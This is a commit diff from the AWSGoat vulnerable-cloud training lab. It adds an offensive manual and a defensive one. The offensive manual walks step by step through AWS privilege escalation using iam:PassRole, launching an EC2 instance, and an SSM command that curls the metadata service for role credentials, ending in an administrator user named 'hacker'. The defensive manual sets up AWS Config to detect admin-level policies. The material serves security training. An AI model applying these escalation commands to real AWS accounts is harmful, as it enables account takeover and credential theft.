Merge pull request ine-labs#27 from SSKale1/master

Release Defensive manuals for AWSGoat.

README.md

@@ -162,7 +162,7 @@ Litesh Ghute, Software Engineer (Cloud) Intern, INE <[email protected]>
 
 # Solutions
 
-The manuals are available in the [solutions](solutions/) directory 
+The offensive manuals are available in the [attack-manuals](attack-manuals/) directory, and the defensive manuals are available in the [defense-manuals](defense-manuals/) directory. 
 
 Module 1 Exploitation Videos: <https://www.youtube.com/playlist?list=PLcIpBb4raSZEMosUmY8KpxPWtjKRMSmNx>
 

attack-manuals/module-2/04-IAM Privilege Escalation.md

@@ -0,0 +1,204 @@
+# Objective
+
+Escalate Privileges to become an administrator on the AWS Account.
+
+# Solution
+
+* We have already obtained the ECS host instance's IAM Credentials in the previous manual.
+
+* Now let's try to create a user using those credentials.
+
+## Creating a User
+
+* Let's check the policies attached to our assumed **ecs-instance-role**
+
+```console
+aws iam list-attached-role-policies --role-name ecs-instance-role
+```
+
+![](./images/04/01.png)
+
+* As we can see, this role has **IAMFullAccess**. So we should be able to create a user and grant him administrator access. Let's try to create a user named **hacker**.
+
+```console
+aws iam create-user --user-name hacker
+```
+
+![](./images/04/02.png)
+
+* Error! we have been denied permission even though we have the **IAMFullAccess** policy. Let's get the role details
+
+```console
+aws iam get-role --role-name ecs-instance-role
+```
+
+![](./images/04/03.png)
+
+* There is a permissions boundary associated with the role, we can try to view it.
+
+```console
+aws iam get-policy --policy-arn arn:aws:iam::676162304320:policy/aws-goat-instance-boundary-policy
+```
+
+![](./images/04/04.png)
+
+```console
+aws iam get-policy-version --policy-arn arn:aws:iam::676162304320:policy/aws-goat-instance-boundary-policy --version-id v1
+```
+
+![](./images/04/05.png)
+
+* Here, we can observe that we have IAM List and Get access along with **iam:PassRole**, **ssm**, **ec2:RunInstance**.
+
+* From all the information we have, we can try to run a new instance and pass a role that has our desired permissions and create a new user using the creds obtained from the new instance.
+
+## Finding a role with desired permissions
+
+* First, we need to list roles to check for our desired permissions.
+
+```console
+aws iam list-roles
+```
+
+![](./images/04/06.png)
+
+* We can observe that there is an **ec2Deployer-role**. Let's get the policies attached to it.
+
+```console
+aws iam list-attached-role-policies --role-name ec2Deployer-role
+```
+
+![](./images/04/07.png)
+
+* Now, let's get the policy's version.
+
+```console
+aws iam get-policy-version --policy-arn arn:aws:iam::676162304320:policy/ec2DeployerAdmin-policy --version-id v1
+```
+
+![](./images/04/08.png)
+
+* Voila! we have a policy that allows us to perform all actions on all resources, now we need an instance profile with the **ec2Deployer-role** role attached to it!
+
+* List the instance profiles
+
+```console
+aws iam list-instance-profiles
+```
+
+![](./images/04/09.png)
+
+* Make note of the ```InstanceProfileName``` (ec2Deployer) associated with our desired ```RoleName``` (ec2Deployer-role)
+
+* Now, let's try to pass this role to a new instance.
+
+## Running new instance
+
+* For running a new instance we need an **AMI, a security group, a subnet, and an instance profile**.
+
+* First, let's find an Amazon Linux 2 AMI. The below command lists the latest AMI.
+
+```console
+aws ec2 describe-images --owners amazon --filters 'Name=name,Values=amzn-ami-hvm-*-x86_64-gp2' 'Name=state,Values=available'  --query 'reverse(sort_by(Images,&CreationDate))[:1].{id:ImageId,date:CreationDate}'
+```
+
+![](./images/04/10.png)
+
+* Make note of the AMI ID, here we get ```ami-01a73f51321ab6899``` as our Amazon Linux 2 AMI.
+
+* Now, let's check for the available subnets
+
+```console
+aws ec2 describe-subnets
+```
+
+![](./images/04/11.png)
+
+* Let's take ```subnet-04b5603ee98706543``` as the subnet id
+
+* Now, check for security groups
+
+```console
+$ aws ec2 describe-security-groups
+```
+
+![](./images/04/12.png)
+
+* Let's take ```sg-001cef4a9d95ebde0``` as the sg id.
+
+* You'll have to make sure both the security group and the subnet are a part of the same VPC, thus having the same ```VpcId``` in their listings.
+
+* We have everything now to run a new instance. Let's run a new instance and pass the ```ec2Deployer-role``` to it.
+
+```console
+aws ec2 run-instances --subnet-id subnet-04b5603ee98706543 --image-id ami-01a73f51321ab6899 --iam-instance-profile Name=ec2Deployer --instance-type t2.micro --security-group-ids "sg-001cef4a9d95ebde0"
+```
+
+![](./images/04/13.png)
+
+* Voila! we have created a new instance! make note of the ```InstanceID```. In our case, it is ```i-05815ea234a226115```
+
+* Now, Let's create a user by obtaining credentials of the passed role with the help of ```ssm```
+
+## Obtaining Credentials
+
+* Run the below command to obtain temporary access credentials for ```ec2Deployer-role```
+
+```console
+aws ssm send-command --document-name "AWS-RunShellScript" --parameters 'commands=["curl http://169.254.169.254/latest/meta-data/iam/security-credentials/ec2Deployer-role/"]' --targets "Key=instanceids,Values=i-05815ea234a226115" --comment "aws cli 1"
+```
+
+![](./images/04/14.png)
+
+* Make note of the ```CommandId``` to check the commands execution result.
+
+* Now let's get the creds from the result.
+
+```console
+aws ssm get-command-invocation --command-id "3c827d63-7a7a-4eeb-bf5f-337cc42b3479" --instance-id "i-05815ea234a226115"
+```
+
+![](./images/04/15.png)
+
+* We now have the credentials of ```ec2Deployer-role```. Let's export them and create a user.
+
+## Creating the user
+
+* First, export the credentials and with these credentials, we can use the role passed to our newly launched instance.
+
+```console
+export AWS_ACCESS_KEY_ID=<value>
+export AWS_SECRET_ACCESS_KEY=<value>
+export AWS_SESSION_TOKEN=<value>
+aws sts get-caller-identity
+```
+
+![](./images/04/16.png)
+
+* Now, let's try to create a user.
+
+```console
+aws iam create-user --user-name hacker
+```
+
+![](./images/04/17.png)
+
+* We'll now attach AdministratorAccess Policy, and create a login profile for our hacker user.
+
+```console
+aws iam attach-user-policy --policy-arn arn:aws:iam::aws:policy/AdministratorAccess --user-name hacker
+aws iam create-login-profile --user-name hacker --password hackerPassword@123
+aws iam create-access-key --user-name hacker
+```
+
+![](./images/04/18.png)
+
+* We have successfully created a user with **AdministratorAccess** on the **AWS Account!**
+
+# What's Happening?
+
+* After finding out the resources and actions we have access to, we were able to run an instance and utilize **ec2:passRole** to pass a role that has the desired permissions.
+
+* With the help of **ssm**, we executed a command on the new instance to obtain the temporary access credentials of the role we passed it.
+
+* Since that role has our desired permissions, we were able to use its credentials to create a new user on the **AWS Account** with Administrator Access and elevate our privileges.

defence-manuals/AWS Config.md

@@ -0,0 +1,135 @@
+# Objective
+Detect changes in configuration using AWS Config
+
+# Solution
+
+* Log in to [AWS account](https://aws.amazon.com/) where [AWS Goat](https://github.com/ine-labs/AWSGoat) infrastructure has been deployed
+
+*  Now, search for **Config** and head to it's page.
+
+    ![](./images/AWS-Config/1.png)
+
+* Click on **Get Started**
+
+    ![](./images/AWS-Config/2.png)
+
+## Creating Config Rule
+
+* In the next page, select the options as shown below
+
+    ![](./images/AWS-Config/3.png)
+
+* Leave the rest as defualt and click on **Next**.
+
+* In the **Step 2** page, search for `iam-policy-no-statements-with-admin-access` under **AWS Managed Rules**.
+
+    ![](./images/AWS-Config/4.png)
+
+* Select that rule and click on **Next**.
+
+* Leave all options as default in the next page and create the rule.
+
+* We have successfully created a rule which monitors for policy that has access to all services and all resources.
+
+* Let's check if this rule is working properly.
+
+## Testing Config Rule
+
+* Head to **IAM** > **Policies** > **Create Policy** on the console
+
+    ![](./images/AWS-Config/5.png)
+
+* Now, in the **Create Policy**, select on **JSON** and paste the below policy.
+
+    ```JSON
+    {
+        "Version": "2012-10-17",
+        "Statement": [
+            {
+                "Effect":"Allow",
+                "Action":"*",
+                "Resource":"*"
+            }
+        ]
+    }
+    ```
+
+    ![](./images/AWS-Config/6.png)
+
+* Click on **Next** and name the policy as `FullAccessPolicy`.
+
+    ![](./images/AWS-Config/7.png)
+
+* Now, head back to **Config** > **Rules**.
+
+    ![](./images/AWS-Config/8.png)
+
+* We can see that now we have 1 Non-Compliant Resource! click on the rule to view the **Non-Compliant Resourse**.
+
+* Voila! it is the policy that we had just created.
+
+    ![](./images/AWS-Config/9.png)
+
+* Now, delete the policy and check if the **Detective Complaince** status has changed.
+
+    ![](./images/AWS-Config/10.png)
+
+    ![](./images/AWS-Config/11.png)
+
+* The status changed, the rule is working perfectly! You can add more rules to monitor the changes in the configuration.
+
+# Inferences
+
+* AWS Config tracks and monitors changes in the configuration.
+
+* We can trigger the evaluations periodically or trigger them when all/specific resource changes.
+
+* When we created a policy with full access to all resources, AWS Config quickly evaluated the resources based on the trigger and changed the complaince status, this helps us identify if someone is trying to exploit our resources.
+
+* This can help us detect the attack performed in [IAM Privilege Escalation Manual](https://github.com/ine-labs/AWSGoat/blob/master/attack-manuals/module-1/07-IAM%20Privilege%20Escalation.md). where the hacker tries to create an overly permissive policy.
+
+# Additional Things To-Do
+
+* By performing above steps, we can only view the complaince status in AWS Console. We won't be able to check the Config page every now and then to view the complaince status. Therefore, we need an automatic notification system.
+
+* To do that, we can trigger the config to publish a message into an SNS Topic which in turn sends an email whenever the rule is non-complaint.
+
+* This is possible by creating a remediation to the rule in AWS Config.
+
+## Creating Topic
+
+* First, head over to **Simple Notification Sevice** Page.
+
+    ![](./images/AWS-Config/12.png)
+
+* Now, create a topic names `Config-Change-Email`.
+
+    ![](./images/AWS-Config/13.png)
+
+* Now, create a subscription for the topic. Select the **Protocol** as **Email** and enter the preferred email where you want to receive the notification.
+
+    ![](./images/AWS-Config/14.png)
+
+## Creating Remediation
+
+* Head back to **Config** > **Rules** and select **Manage Remediation** under **Actions** dropdown for our rule.
+
+    ![](./images/AWS-Config/15.png)
+
+* In the next page, select the options as shown below.
+
+    ![](./images/AWS-Config/16.png)
+
+* Type in the Topic arn, Message and AutomationAssumeRole.
+
+    ![](./images/AWS-Config/17.png)
+
+* We have successfully created a remediation. With this we will now be able to get an email notification whenever there is change in the configuration.
+
+# Further Readings
+
+* [What is AWS Config?](https://docs.aws.amazon.com/config/latest/developerguide/WhatIsConfig.html)
+
+* [IAM Security Best Practices](https://docs.aws.amazon.com/IAM/latest/UserGuide/best-practices.html)
+
+* [What is Amazon Macie?](https://docs.aws.amazon.com/macie/latest/user/what-is-macie.html)